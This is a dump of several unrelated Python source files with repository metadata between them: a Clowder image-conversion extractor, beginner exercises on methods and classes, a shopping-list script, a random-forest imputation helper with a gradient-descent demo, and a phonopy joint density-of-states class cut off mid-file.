    the conversion, uploads outputs to Clowder, and logs timing to InfluxDB.
    """
    def __init__(self):
        Extractor.__init__(self)
        # Influx connection settings are taken from the environment, with fallbacks.
        # NOTE(review): the --influx* command-line options added below are parsed
        # but never read back; self.influx_params uses these env values instead.
        # Confirm whether the CLI flags were meant to override the environment.
        influx_host = os.getenv("INFLUXDB_HOST", "terra-logging.ncsa.illinois.edu")
        influx_port = os.getenv("INFLUXDB_PORT", 8086)
        influx_db = os.getenv("INFLUXDB_DB", "extractor_db")
        influx_user = os.getenv("INFLUXDB_USER", "terra")
        influx_pass = os.getenv("INFLUXDB_PASSWORD", "")
        # add any additional arguments to parser
        self.parser.add_argument('--output', '-o', dest="output_dir", type=str, nargs='?',
                                 default="/home/extractor/sites/ua-mac/Level_1/stereoTop_geotiff",
                                 help="root directory where timestamp & output directories will be created")
        self.parser.add_argument('--overwrite', dest="force_overwrite", type=bool, nargs='?', default=False,
                                 help="whether to overwrite output file if it already exists in output directory")
        self.parser.add_argument('--influxHost', dest="influx_host", type=str, nargs='?',
                                 default="terra-logging.ncsa.illinois.edu", help="InfluxDB URL for logging")
        self.parser.add_argument('--influxPort', dest="influx_port", type=int, nargs='?',
                                 default=8086, help="InfluxDB port")
        self.parser.add_argument('--influxUser', dest="influx_user", type=str, nargs='?',
                                 default="terra", help="InfluxDB username")
        self.parser.add_argument('--influxPass', dest="influx_pass", type=str, nargs='?',
                                 default=influx_pass, help="InfluxDB password")
        self.parser.add_argument('--influxDB', dest="influx_db", type=str, nargs='?',
                                 default="extractor_db", help="InfluxDB database")
        # parse command line and load default logging configuration
        self.setup()
        # setup logging for the extractor
        logging.getLogger('pyclowder').setLevel(logging.DEBUG)
        logging.getLogger('__main__').setLevel(logging.DEBUG)
        # assign other arguments
        self.output_dir = self.args.output_dir
        self.force_overwrite = self.args.force_overwrite
        self.influx_params = {
            "host": influx_host,
            "port": influx_port,
            "db": influx_db,
            "user": influx_user,
            "pass": influx_pass
        }
    def check_message(self, connector, host, secret_key, resource, parameters):
        """Decide whether this dataset event warrants downloading and processing.

        Requires a *_left.bin / *_right.bin pair, outputs that are absent (or
        force_overwrite), and LemnaTec measurement metadata on the dataset.
        Returns a pyclowder CheckMessage value.
        """
        if not terrautils.extractors.is_latest_file(resource):
            return CheckMessage.ignore
        # Check for a left and right BIN file - skip if not found
        found_left = False
        found_right = False
        for f in resource['files']:
            if 'filename' in f:
                if f['filename'].endswith('_left.bin'):
                    found_left = True
                elif f['filename'].endswith('_right.bin'):
                    found_right = True
        if not (found_left and found_right):
            return CheckMessage.ignore
        # Check if outputs already exist unless overwrite is forced - skip if found
        out_dir = terrautils.extractors.get_output_directory(self.output_dir, resource['dataset_info']['name'])
        if not self.force_overwrite:
            lbase = os.path.join(out_dir, terrautils.extractors.get_output_filename(
                resource['dataset_info']['name'], '', opts=['left']))
            rbase = os.path.join(out_dir, terrautils.extractors.get_output_filename(
                resource['dataset_info']['name'], '', opts=['right']))
            # NOTE(review): lbase/rbase appear to end with '.' so +'jpg' forms
            # the extension - confirm against get_output_filename's contract.
            if (os.path.isfile(lbase+'jpg') and os.path.isfile(rbase+'jpg') and
                    os.path.isfile(lbase+'tif') and os.path.isfile(rbase+'tif')):
                logging.info("skipping dataset %s; outputs found in %s" % (resource['id'], out_dir))
                return CheckMessage.ignore
        # Check metadata to verify we have what we need
        md = pyclowder.datasets.download_metadata(connector, host, secret_key, resource['id'])
        found_meta = False
        for m in md:
            # If there is metadata from this extractor, assume it was previously processed
            if not self.force_overwrite:
                if 'agent' in m and 'name' in m['agent']:
                    if m['agent']['name'].endswith(self.extractor_info['name']):
                        logging.info("skipping dataset %s; metadata indicates it was already processed" % resource['id'])
                        return CheckMessage.ignore
            if 'content' in m and 'lemnatec_measurement_metadata' in m['content']:
                found_meta = True
        if found_left and found_right and found_meta:
            return CheckMessage.download
        else:
            return CheckMessage.ignore
    def process_message(self, connector, host, secret_key, resource, parameters):
        """Convert the left/right BIN pair to JPG + geoTIFF, upload, and record metadata.

        Each of the four outputs is regenerated only if missing or
        force_overwrite is set; newly created files are uploaded to Clowder,
        their IDs stored in dataset metadata, and timing sent to InfluxDB.
        """
        starttime = datetime.datetime.now().strftime('%Y-%m-%dT%H:%M:%S')
        created = 0
        # NOTE(review): 'bytes' shadows the builtin of the same name.
        bytes = 0
        img_left = None
        img_right = None
        metadata = None
        # Determine output location & filenames
        out_dir = terrautils.extractors.get_output_directory(self.output_dir, resource['dataset_info']['name'])
        logging.info("...output directory: %s" % out_dir)
        if not os.path.exists(out_dir):
            os.makedirs(out_dir)
        lbase = os.path.join(out_dir, terrautils.extractors.get_output_filename(
            resource['dataset_info']['name'], '', opts=['left']))
        rbase = os.path.join(out_dir, terrautils.extractors.get_output_filename(
            resource['dataset_info']['name'], '', opts=['right']))
        left_jpg = lbase+'jpg'
        right_jpg = rbase+'jpg'
        left_tiff = lbase+'tif'
        right_tiff = rbase+'tif'
        # Get left/right files and metadata
        for fname in resource['local_paths']:
            if fname.endswith('_dataset_metadata.json'):
                md = bin2tiff.load_json(fname)
                for m in md:
                    if 'content' in m and 'lemnatec_measurement_metadata' in m['content']:
                        metadata = bin2tiff.lower_keys(m['content'])
                        break
            elif fname.endswith('_left.bin'):
                img_left = fname
            elif fname.endswith('_right.bin'):
                img_right = fname
        if None in [img_left, img_right, metadata]:
            raise ValueError("could not locate each of left+right+metadata in processing")
        uploaded_file_ids = []
        logging.info("...determining image shapes")
        left_shape = bin2tiff.get_image_shape(metadata, 'left')
        right_shape = bin2tiff.get_image_shape(metadata, 'right')
        (left_gps_bounds, right_gps_bounds) = terrautils.extractors.calculate_gps_bounds(metadata)
        out_tmp_tiff = "/home/extractor/"+resource['dataset_info']['name']+".tif"
        skipped_jpg = False
        if (not os.path.isfile(left_jpg)) or self.force_overwrite:
            logging.info("...creating & uploading left JPG")
            left_image = bin2tiff.process_image(left_shape, img_left, None)
            terrautils.extractors.create_image(left_image, left_jpg)
            # Only upload the newly generated file to Clowder if it isn't already in dataset
            if left_jpg not in resource['local_paths']:
                fileid = pyclowder.files.upload_to_dataset(connector, host, secret_key, resource['id'], left_jpg)
                uploaded_file_ids.append(fileid)
            created += 1
            bytes += os.path.getsize(left_jpg)
        else:
            # JPG already existed: left_image was not decoded; the TIFF branch
            # below re-decodes it if needed.
            skipped_jpg = True
        if (not os.path.isfile(left_tiff)) or self.force_overwrite:
            logging.info("...creating & uploading left geoTIFF")
            if skipped_jpg:
                left_image = bin2tiff.process_image(left_shape, img_left, None)
            # Rename output.tif after creation to avoid long path errors
            terrautils.extractors.create_geotiff(left_image, left_gps_bounds, out_tmp_tiff)
            shutil.move(out_tmp_tiff, left_tiff)
            if left_tiff not in resource['local_paths']:
                fileid = pyclowder.files.upload_to_dataset(connector, host, secret_key, resource['id'], left_tiff)
                uploaded_file_ids.append(fileid)
            created += 1
            bytes += os.path.getsize(left_tiff)
            # Free the decoded image buffer before handling the right side.
            del left_image
        skipped_jpg = False
        if (not os.path.isfile(right_jpg)) or self.force_overwrite:
            logging.info("...creating & uploading right JPG")
            right_image = bin2tiff.process_image(right_shape, img_right, None)
            terrautils.extractors.create_image(right_image, right_jpg)
            if right_jpg not in resource['local_paths']:
                fileid = pyclowder.files.upload_to_dataset(connector, host, secret_key, resource['id'], right_jpg)
                uploaded_file_ids.append(fileid)
            created += 1
            bytes += os.path.getsize(right_jpg)
        else:
            skipped_jpg = True
        if (not os.path.isfile(right_tiff)) or self.force_overwrite:
            logging.info("...creating & uploading right geoTIFF")
            if skipped_jpg:
                right_image = bin2tiff.process_image(right_shape, img_right, None)
            terrautils.extractors.create_geotiff(right_image, right_gps_bounds, out_tmp_tiff)
            shutil.move(out_tmp_tiff, right_tiff)
            if right_tiff not in resource['local_paths']:
                fileid = pyclowder.files.upload_to_dataset(connector, host, secret_key, resource['id'],right_tiff)
                uploaded_file_ids.append(fileid)
            created += 1
            bytes += os.path.getsize(right_tiff)
            del right_image
        # Remove existing metadata from this extractor before rewriting
        md = pyclowder.datasets.download_metadata(connector, host, secret_key, resource['id'], self.extractor_info['name'])
        for m in md:
            if 'agent' in m and 'name' in m['agent']:
                if m['agent']['name'].endswith(self.extractor_info['name']):
                    if 'files_created' in m['content']:
                        # Preserve file IDs recorded by previous runs.
                        uploaded_file_ids += m['content']['files_created']
        pyclowder.datasets.remove_metadata(connector, host, secret_key, resource['id'], self.extractor_info['name'])
        # Tell Clowder this is completed so subsequent file updates don't daisy-chain
        metadata = terrautils.extractors.build_metadata(host, self.extractor_info['name'], resource['id'], {
            "files_created": uploaded_file_ids
        }, 'dataset')
        pyclowder.datasets.upload_metadata(connector, host, secret_key, resource['id'], metadata)
        endtime = datetime.datetime.now().strftime('%Y-%m-%dT%H:%M:%S')
        terrautils.extractors.log_to_influxdb(self.extractor_info['name'], self.influx_params,
                                              starttime, endtime, created, bytes)
if __name__ == "__main__":
    # Build the extractor and begin listening for extraction messages.
    StereoBin2JpgTiff().start()
| [
"mburnet88@gmail.com"
] | mburnet88@gmail.com |
16229f8817a3670bbd21475e045b2bde33002484 | 9439162b98f039992b1aeb7120fb832bb5b70852 | /activities/5_methods.py | aa3e68114d3511c8fa0c2ddd022cd6f6efe78d62 | [] | no_license | Susaposa/Homwork_game- | 56fe70a77575197f1e3c24c7643ea1a6b48dd0f6 | 38916f626d15dfbb393ffcb5bdf603483ce64ed7 | refs/heads/master | 2021-06-13T16:03:29.095396 | 2020-04-09T17:38:52 | 2020-04-09T17:38:52 | 254,439,298 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,440 | py | # REMINDER: Only do one challenge at a time! Save and test after every one.
# Challenge 0: Remember: Do the first thing for any Python activity.
print('Challenge 1 -------------')
# Challenge 1:
# Uncomment the following code and fix the typos to practice using the list
# methods. If correct, we should see Shrek, Frozen, Titanic in that order.
my_fave_movies = []
# my_fave_movies.append(Titanic)
# my_fave_movies append("Frozen")
# my_fave_movies.append("Shrek"
# my_fave_movies.reverse
print(my_fave_movies)
print('Challenge 2 -------------')
# Challenge 2:
# 1. Uncomment the following code and fix the typos to practice using methods.
# 2. It should print out the dictionary keys, the phrase 'No manners!', the
# dictionary values, and then the word SHREK centered in the screen.
# Hint 1: Methods need a "." before them!
# Hint 2: Never should there be two values, functions, or variables separated
# only by space. There should always be some sort of operator, a dot, or
# something between them.
user_info = {
'username': 'shrek',
'location': 'swamp',
'friend': 'donkey',
}
#print(user_info keys())
#print(user_info get(manners, 'No manners!'))
#print(user_info.values[])
#print(user_info['username'] upper() center(80))
print('Challenge 3 -------------')
# Challenge 3:
# Uncomment the following code. Modify it using string methods to "sanitize"
# the input. That is to say, make it so that the user can type in weird
# spellings of yes, such as "YeS", " yes " or "YES" to cause the program
# to continue.
# Hint: Look up the documentation on string methods in Python.
#answer = 'yes'
#while answer == 'yes':
# answer = input('Stay in swamp? ')
# # TODO: Sanitize 'answer' variable
#print('Leaving swamp...')
print('Challenge 4 -------------')
# Challenge 4:
# - Let's dip our toes further into Object Oriented Programming. We'll cover
# this in more detail in a couple lessons, but the following code ("class
# Ogre") is code that defines a new class aka data-type, with its own custom
# methods (methods being functions defined inside a class).
# - Below it, commented out, are attempts to call each of the three methods.
# Each is written incorrectly. Uncomment them, and fix each of their mistakes.
class Ogre:
    """Reference class for Challenge 4: three simple instance methods."""

    def say_name(self):
        """Print this ogre's name."""
        print('My name is Shrek')

    def get_friend_name(self):
        """Return the name of the ogre's sidekick."""
        return 'Donkey'

    def get_enemy_name(self):
        """Return the name of the ogre's antagonist."""
        return 'Lord Farquaad'
shrek = Ogre()
# shrek.say_name
# print(shrek['get_friend_name'])
# print(shrek.get_enemy_name()
print('Challenge 5 -------------')
# Challenge 5:
# - Time to get classy! To get more early practice with class syntax, create 3
# classes: One called LordFarquaad, one called PrincessFiona, one called
# PrinceCharming.
# - You can use the Ogre class above for reference of syntax.
# - Each should have 3 methods, each method returning different values.
# --------------------- --------------------- ----------------------
# | LordFarquaad | PrincessFiona | PrinceCharming |
# --------------------- --------------------- ----------------------
# get_title | "Lord" | "Princess" | "Prince" |
# get_name | "Lord Farquaad" | "Princess Fiona" | "Prince Charming" |
# is_villain | True | False | True |
print('-------------')
# Bonus Challenge 1:
# We'll get more into the theory of OOP in a couple lessons. But until then,
# uncomment and examine the following code. See if you understand what is going
# on. See if you can refactor the 3 classes you defined in Challenge 5 to be a
# single class that takes different inputs to the `__init__` method. Once you
# have done that, see if you can create 3 instances of the class, one for each
# character that you made above.
#class Ogre:
# def __init__(self, name, location):
# self.name = name
# self.location = location
#
# def get_name(self):
# return self.name
#
# def get_location(self):
# return self.location
#
#shrek = Ogre('Shrek', 'swamp')
#print(shrek.get_name())
#print(shrek.name)
#print(shrek.get_location())
#print(shrek.location)
# Advanced Bonus Challenge:
# See if you can rewrite the bonus challenge from 2_functions.py using a class.
# Hint: Use a single class for "Location", then create many instances of that
# class for each location you can go.
| [
"susanamendoza.pd@gmail.com"
] | susanamendoza.pd@gmail.com |
d79fa7df140731982c79241a6add1e2cf01278ec | 89fa8881cd4f302d37667206e0f3ad0e00c8bfe9 | /proj1/shopping.py | a5103626328737abbced0928c96518988d0b0d7c | [] | no_license | jtsurfrat/python_mis | 09b018e1034ebe9f6e2fb7fc95746725e6226c61 | 4f1e039d53d8db6f16a1e48cbd33cb5e79d34657 | refs/heads/master | 2020-04-27T23:27:24.924319 | 2019-03-10T04:18:37 | 2019-03-10T04:18:37 | 174,776,794 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,924 | py | # my_list = []
# stop_shopping = False
#
# while stop_shopping == False:
# keep_shopping = bool(input("Keep shopping? "))
#
# if keep_shopping == True:
# print("You have " ,my_list)
# new_item = "{}".format(input("Please choose item"))
# print(new_item)
# else:
# print("You don't want to shop", keep_shopping)
# my_list = ["Bacon", "Cat", "Dinosaur"]
#
# for item in my_list:
# print(my_list)
# make a list hold onto our items
# shopping_list = []
# #print out intstructions on how to us app
# print("What should we pick up at the store. ")
# print("Enter 'Done' to stop adding item. ")
#
# while True:
# # ask for new items
# new_item = input("> ")
# new_item = new_item.upper()
# # be able to quit the app
# if new_item == 'DONE':
# break
# # add for new items
# shopping_list.append(new_item)
#
#
# # print out the list
# print("Here's your list: ")
#
# for item in shopping_list:
# print(item)
my_list = []
def show_help():
    """Print the command menu for the shopping-list prompt loop."""
    print("What should we pick up at the store. ")
    print("""
    Enter DONE to stop app
    Enter 'HELP' for this help
    Enter 'LIST' to see list
    """)
def show_list(my_list):
    """Print each entry of my_list on its own line, then a summary line.

    The summary prints the raw list repr (original behavior, kept as-is).
    """
    # Renamed the loop variable: the old 'list' shadowed the builtin.
    for item in my_list:
        print(item)
    print("Your list includes {} and has {} items".format(my_list, len(my_list)))
def add_new_item(new_item):
    """Append new_item to the module-level my_list and report the new size."""
    my_list.append(new_item)
    print(f"Added {new_item}. List has {len(my_list)} items")
# Entry point: greet the user, show usage, then loop on commands until DONE.
print("What to pick up at the store")
show_help()
while True:
    new_item = input(">").upper()
    if new_item == "DONE":
        break
    if new_item == "HELP":
        show_help()
    elif new_item == "LIST":
        show_list(my_list)
    else:
        add_new_item(new_item)
show_list(my_list)
#
| [
"jjsurfgirl@Jennas-MacBook-Pro.local"
] | jjsurfgirl@Jennas-MacBook-Pro.local |
786550fed5bb7fed27228a771e58a1e4c2cb45dc | bd7072dabd993beb533d48fccee43f3dd81070e9 | /Credit_Card_Rating/RandomTree_fillna.py | c0642f5de8f403a1d8952e6d47ef04f3e9139c3f | [] | no_license | hurrywish/Hurrywish_Warehouse | fec12fd3afed18e3bb112ec02cf1e92882eea1f6 | b53d3b34fd25c03eec8d889c007831ba4a601ddb | refs/heads/master | 2023-01-23T19:17:15.234047 | 2020-12-05T08:00:39 | 2020-12-05T08:00:39 | 230,160,704 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,093 | py | import numpy as np
import pandas as pd
from sklearn.datasets import load_boston
from sklearn.ensemble import RandomForestRegressor
# dataset = load_boston()
# x_full = dataset.data
# y_full = dataset.target
# rows = x_full.shape[0]
# columns = x_full.shape[1]
#
# size = columns * rows
# missing_rate = 0.2
# n_missing = int(np.floor(size * missing_rate))
# rs = np.random.RandomState(1)
#
# x_processed = np.ravel(x_full)
# missing_number = rs.randint(0, size + 1, n_missing)
# x_processed[missing_number] = np.nan
# x_processed = x_processed.reshape(rows, columns)
#
# data_x = pd.DataFrame(x_processed)
def regr_fillna(data):
    """Impute missing values column-by-column with random-forest regression.

    Columns are processed in ascending order of their NaN counts; for each
    column that has missing entries, the remaining columns (with their own
    NaNs temporarily zero-filled) are used as features to predict the gaps.
    Returns a new DataFrame; the input is left unmodified.
    """
    import numpy as np
    import pandas as pd
    from sklearn.ensemble import RandomForestRegressor
    # Work on a re-indexed copy so positional .iloc/.loc lookups line up.
    data = pd.DataFrame(data).reset_index(drop=True).copy()
    nan_values = list()
    for i in data.columns:
        nan_value = data[i].isnull().sum()
        nan_values.append(nan_value)
    # Column positions sorted so the least-missing columns are filled first.
    nan_values = list(np.argsort(nan_values))
    print(nan_values)
    while nan_values:
        columns_fill_value = data.columns[nan_values.pop(0)]
        columns_fill_0 = [i for i in data.columns if i != columns_fill_value]
        if data[columns_fill_value].isnull().sum() == 0:
            # Runtime message kept verbatim; '无空值' means "no missing values".
            print(columns_fill_value, '无空值')
        else:
            new_data = data.copy()
            # Zero-fill the feature columns so the regressor never sees NaNs.
            new_data[columns_fill_0] = new_data[columns_fill_0].fillna(0)
            sample = new_data[columns_fill_0]
            label = new_data[columns_fill_value]
            y_train = label[label.notnull()]
            y_test = label[label.isnull()]
            x_train = sample.iloc[y_train.index]
            x_test = sample.iloc[y_test.index]
            regr = RandomForestRegressor(n_estimators=100,n_jobs=-1)
            regr.fit(x_train, y_train)
            y_pred = regr.predict(x_test)
            data.loc[y_test.index,[columns_fill_value]] = y_pred
            train_score = regr.score(x_train, y_train)
            # Runtime message kept verbatim; '%s列,得分:%0.2f' means "column %s, score %.2f".
            print('%s列,得分:%0.2f' % (columns_fill_value, train_score))
    return data
# data1 = regr_fillna(x_processed)
# print(data1)
| [
"hurrywish@MacbookPro2019.lan"
] | hurrywish@MacbookPro2019.lan |
f2eb9fb4d19424e0c0a0c5da2b96f55c214162b6 | a4cee21ba028e8d9a0d0e8ae33dcb84d20bf894f | /machinLearn/test.py | 5ca6bf16c8bae0acd5c8c6f69026157c75a1b4ea | [] | no_license | Aeee90/python | f8ac109adfaa06defb98b162bb4369bcded00458 | f91f3331b74c788604fda900ef43b5a7858a5809 | refs/heads/master | 2020-04-14T07:30:35.482549 | 2019-01-01T05:10:23 | 2019-01-01T05:10:23 | 163,714,510 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,576 | py | import numpy as np
import matplotlib.pyplot as plt
dataSet2 = ([1,1],[2,2],[3,3],[4,4],[5,5],[6,6],[7,7],[8,8],[9,9],[10,10],[11,11],[12,12],[13,13],[14,14],[15,15],[16,16],[17,17],[18,18],[19,19],[20,20])
dataSet3 = ([1,3],[2,5],[3,7],[4,9],[5,11],[6,13],[7,15],[8,17],[9,19],[10,21],[11,23],[12,25],[13,27],[14,29],[15,31],[16,33],[17,35],[18,37],[19,39],[20,41])
lr = 0.01
M = len(dataSet3)
print("데이터크기 M = {}".format(M))
print("learning rate Alpha = {}".format(lr))
# Unpack the data set into flat x/y lists so each point can be plotted.
x = [row[0] for row in dataSet3]
y = [row[1] for row in dataSet3]
class heightAndWeight:
    """Linear-regression demo over the module-level x/y data (plots via matplotlib)."""
    def showDataSet(self, theta0, theta1):
        """Scatter-plot the data and overlay the line y = theta0 + theta1*x."""
        plt.plot(x, y, 'rs')
        plt.xlabel('X')
        plt.ylabel('Y')
        x2 = np.arange(1, M)
        y2 = theta0 + theta1*x2
        plt.plot(x2, y2)
        plt.show()
    def costFunction(self, theta0, theta1):
        """Plot the mean-squared-error cost over the given theta0 values.

        NOTE(review): theta1 is accepted but unused; the slope is hard-coded
        as 4/9 in the inner loop - confirm whether that was intentional.
        """
        #theta0 , theta1 = np.arange(-1, 1, 0.1), np.arange(-1, 1, 0.1)
        # Plot the cost function over theta0/theta1 for the data set.
        costSum = [];
        for j in np.arange(0, M):
            sum = 0
            for i in np.arange(0,M):
                sum += (theta0[j] + 4/9*x[i] - y[i]) **2
            costSum.append(sum/(2*M))
        plt.plot(theta0, costSum, 'rs')
        plt.xlabel("theta")
        plt.ylabel("Cost Function")
        plt.show()
    def gradient_descent(self, theta0 =3, theta1 =4, count=100):
        """Run batch gradient descent for `count` iterations.

        Returns [final theta0, final theta1, theta0 history, theta1 history].
        """
        # Initial theta values come in as arguments.
        thetaX0, thetaX1 = [], []
        for j in np.arange(0,count):
            # Gradient accumulators for this iteration.
            grad0 , grad1 = 0, 0
            # NOTE(review): ySum/xSum are assigned but never used.
            ySum = 0
            xSum = 0
            for i in np.arange(0,M):
                grad0 += theta0 + theta1*x[i] - y[i]
                grad1 += (theta0 + theta1*x[i] - y[i])*x[i]
            # Scale by the learning rate and the data-set size.
            grad0 = lr*grad0/M
            grad1 = lr*grad1/M
            theta0 = theta0 - grad0
            thetaX0.append(theta0)
            theta1 = theta1 - grad1
            thetaX1.append(theta1)
            # Progress line kept verbatim; '{}번째' means "iteration {}".
            print("{}번째 : theta0 = {}, theta1 = {}".format(j, theta0, theta1))
        #self.costFunction(thetaX0, thetaX1)
        return [theta0, theta1, thetaX0, thetaX1]
# Driver: plot the raw data with an initial guess line, run gradient descent,
# then plot the fitted line.
test = heightAndWeight()
#test.showDataSet()
#test.costFunction(np.arange(-9, -8, 0.05), np.arange(-1, 1, 0.1))
test.showDataSet(1,1)
testTheta = test.gradient_descent(1,1, 100)
test.showDataSet(testTheta[0], testTheta[1])
| [
"iseoyeon@iseoyeon-ui-MacBookPro.local"
] | iseoyeon@iseoyeon-ui-MacBookPro.local |
4c7568977c523b38f203600aec9c4befcad3cb63 | 910a4c0d08dd01bba099dc9167054000ba3d3cc5 | /anharmonic/phonon3/joint_dos.py | 068cbab4417aae0e449cc6c2624dcfa424f12fe8 | [] | no_license | supersonic594/phonopy | 6b8be78c53e1a820397b659844a6357a86b50bc5 | 619c2bae99f6844eb0b33ea90fca246897844869 | refs/heads/master | 2021-01-20T07:54:22.308293 | 2015-11-01T03:44:25 | 2015-11-01T03:44:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,812 | py | import sys
import numpy as np
from phonopy.structure.symmetry import Symmetry
from phonopy.units import VaspToTHz
from anharmonic.phonon3.triplets import (get_triplets_at_q,
get_nosym_triplets_at_q,
get_tetrahedra_vertices,
get_triplets_integration_weights,
occupation)
from anharmonic.phonon3.interaction import set_phonon_c
from anharmonic.phonon3.imag_self_energy import get_frequency_points
from phonopy.harmonic.dynamical_matrix import get_dynamical_matrix
from phonopy.structure.tetrahedron_method import TetrahedronMethod
class JointDos:
def __init__(self,
mesh,
primitive,
supercell,
fc2,
nac_params=None,
nac_q_direction=None,
sigma=None,
cutoff_frequency=None,
frequency_step=None,
num_frequency_points=None,
temperatures=None,
frequency_factor_to_THz=VaspToTHz,
frequency_scale_factor=1.0,
is_nosym=False,
symprec=1e-5,
filename=None,
log_level=False,
lapack_zheev_uplo='L'):
self._grid_point = None
self._mesh = np.array(mesh, dtype='intc')
self._primitive = primitive
self._supercell = supercell
self._fc2 = fc2
self._nac_params = nac_params
self._nac_q_direction = None
self.set_nac_q_direction(nac_q_direction)
self._sigma = None
self.set_sigma(sigma)
if cutoff_frequency is None:
self._cutoff_frequency = 0
else:
self._cutoff_frequency = cutoff_frequency
self._frequency_step = frequency_step
self._num_frequency_points = num_frequency_points
self._temperatures = temperatures
self._frequency_factor_to_THz = frequency_factor_to_THz
self._frequency_scale_factor = frequency_scale_factor
self._is_nosym = is_nosym
self._symprec = symprec
self._filename = filename
self._log_level = log_level
self._lapack_zheev_uplo = lapack_zheev_uplo
self._num_band = self._primitive.get_number_of_atoms() * 3
self._reciprocal_lattice = np.linalg.inv(self._primitive.get_cell())
self._set_dynamical_matrix()
self._symmetry = Symmetry(primitive, symprec)
self._tetrahedron_method = None
self._phonon_done = None
self._frequencies = None
self._eigenvectors = None
self._joint_dos = None
self._frequency_points = None
def run(self):
try:
import anharmonic._phono3py as phono3c
self._run_c()
except ImportError:
print "Joint density of states in python is not implemented."
return None, None
def get_joint_dos(self):
return self._joint_dos
def get_frequency_points(self):
return self._frequency_points
def get_phonons(self):
return self._frequencies, self._eigenvectors, self._phonon_done
def get_primitive(self):
return self._primitive
def get_mesh_numbers(self):
return self._mesh
def set_nac_q_direction(self, nac_q_direction=None):
if nac_q_direction is not None:
self._nac_q_direction = np.array(nac_q_direction, dtype='double')
def set_sigma(self, sigma):
if sigma is None:
self._sigma = None
else:
self._sigma = float(sigma)
def set_grid_point(self, grid_point):
self._grid_point = grid_point
self._set_triplets()
num_grid = np.prod(len(self._grid_address))
num_band = self._num_band
if self._phonon_done is None:
self._phonon_done = np.zeros(num_grid, dtype='byte')
self._frequencies = np.zeros((num_grid, num_band), dtype='double')
self._eigenvectors = np.zeros((num_grid, num_band, num_band),
dtype='complex128')
self._joint_dos = None
self._frequency_points = None
self.set_phonon(np.array([grid_point], dtype='intc'))
def get_triplets_at_q(self):
return self._triplets_at_q, self._weights_at_q
def get_grid_address(self):
return self._grid_address
def get_bz_map(self):
return self._bz_map
def _run_c(self, lang='C'):
if self._sigma is None:
if lang == 'C':
self._run_c_with_g()
else:
if self._temperatures is not None:
print "JDOS with phonon occupation numbers doesn't work",
print "in this option."
self._run_py_tetrahedron_method()
else:
self._run_c_with_g()
def _run_c_with_g(self):
self.set_phonon(self._triplets_at_q.ravel())
if self._sigma is None:
f_max = np.max(self._frequencies) * 2
else:
f_max = np.max(self._frequencies) * 2 + self._sigma * 4
f_max *= 1.005
f_min = 0
self._set_uniform_frequency_points(f_min, f_max)
num_freq_points = len(self._frequency_points)
num_mesh = np.prod(self._mesh)
if self._temperatures is None:
jdos = np.zeros((num_freq_points, 2), dtype='double')
else:
num_temps = len(self._temperatures)
jdos = np.zeros((num_temps, num_freq_points, 2), dtype='double')
occ_phonons = []
for t in self._temperatures:
freqs = self._frequencies[self._triplets_at_q[:, 1:]]
occ_phonons.append(np.where(freqs > self._cutoff_frequency,
occupation(freqs, t), 0))
for i, freq_point in enumerate(self._frequency_points):
g = get_triplets_integration_weights(
self,
np.array([freq_point], dtype='double'),
self._sigma,
is_collision_matrix=True,
neighboring_phonons=(i == 0))
if self._temperatures is None:
jdos[i, 1] = np.sum(
np.tensordot(g[0, :, 0], self._weights_at_q, axes=(0, 0)))
gx = g[2] - g[0]
jdos[i, 0] = np.sum(
np.tensordot(gx[:, 0], self._weights_at_q, axes=(0, 0)))
else:
for j, n in enumerate(occ_phonons):
for k, l in list(np.ndindex(g.shape[3:])):
jdos[j, i, 1] += np.dot(
(n[:, 0, k] + n[:, 1, l] + 1) *
g[0, :, 0, k, l], self._weights_at_q)
jdos[j, i, 0] += np.dot((n[:, 0, k] - n[:, 1, l]) *
g[1, :, 0, k, l],
self._weights_at_q)
self._joint_dos = jdos / num_mesh
def _run_py_tetrahedron_method(self):
thm = TetrahedronMethod(self._reciprocal_lattice, mesh=self._mesh)
self._vertices = get_tetrahedra_vertices(
thm.get_tetrahedra(),
self._mesh,
self._triplets_at_q,
self._grid_address,
self._bz_map)
self.set_phonon(self._vertices.ravel())
f_max = np.max(self._frequencies) * 2
f_max *= 1.005
f_min = 0
self._set_uniform_frequency_points(f_min, f_max)
num_freq_points = len(self._frequency_points)
jdos = np.zeros((num_freq_points, 2), dtype='double')
for vertices, w in zip(self._vertices, self._weights_at_q):
for i, j in list(np.ndindex(self._num_band, self._num_band)):
f1 = self._frequencies[vertices[0], i]
f2 = self._frequencies[vertices[1], j]
thm.set_tetrahedra_omegas(f1 + f2)
thm.run(self._frequency_points)
iw = thm.get_integration_weight()
jdos[:, 1] += iw * w
thm.set_tetrahedra_omegas(f1 - f2)
thm.run(self._frequency_points)
iw = thm.get_integration_weight()
jdos[:, 0] += iw * w
thm.set_tetrahedra_omegas(-f1 + f2)
thm.run(self._frequency_points)
iw = thm.get_integration_weight()
jdos[:, 0] += iw * w
self._joint_dos = jdos / np.prod(self._mesh)
def _set_dynamical_matrix(self):
self._dm = get_dynamical_matrix(
self._fc2,
self._supercell,
self._primitive,
nac_params=self._nac_params,
frequency_scale_factor=self._frequency_scale_factor,
symprec=self._symprec)
def _set_triplets(self):
if self._is_nosym:
if self._log_level:
print "Triplets at q without considering symmetry"
sys.stdout.flush()
(self._triplets_at_q,
self._weights_at_q,
self._grid_address,
self._bz_map,
map_triplets,
map_q) = get_nosym_triplets_at_q(
self._grid_point,
self._mesh,
self._reciprocal_lattice,
with_bz_map=True)
else:
(self._triplets_at_q,
self._weights_at_q,
self._grid_address,
self._bz_map,
map_triplets,
map_q) = get_triplets_at_q(
self._grid_point,
self._mesh,
self._symmetry.get_pointgroup_operations(),
self._reciprocal_lattice)
    def set_phonon(self, grid_points):
        """Compute phonon frequencies/eigenvectors at grid_points (C extension).

        Results are written in place into self._frequencies and
        self._eigenvectors; self._phonon_done marks already-computed points.
        """
        set_phonon_c(self._dm,
                     self._frequencies,
                     self._eigenvectors,
                     self._phonon_done,
                     grid_points,
                     self._grid_address,
                     self._mesh,
                     self._frequency_factor_to_THz,
                     self._nac_q_direction,
                     self._lapack_zheev_uplo)
    def set_frequency_points(self, frequency_points):
        """Use an explicit frequency sampling grid instead of the uniform one."""
        self._frequency_points = np.array(frequency_points, dtype='double')
    def _set_uniform_frequency_points(self, f_min, f_max):
        """Lazily create a uniform frequency grid on [f_min, f_max].

        A grid previously supplied via set_frequency_points is kept as-is.
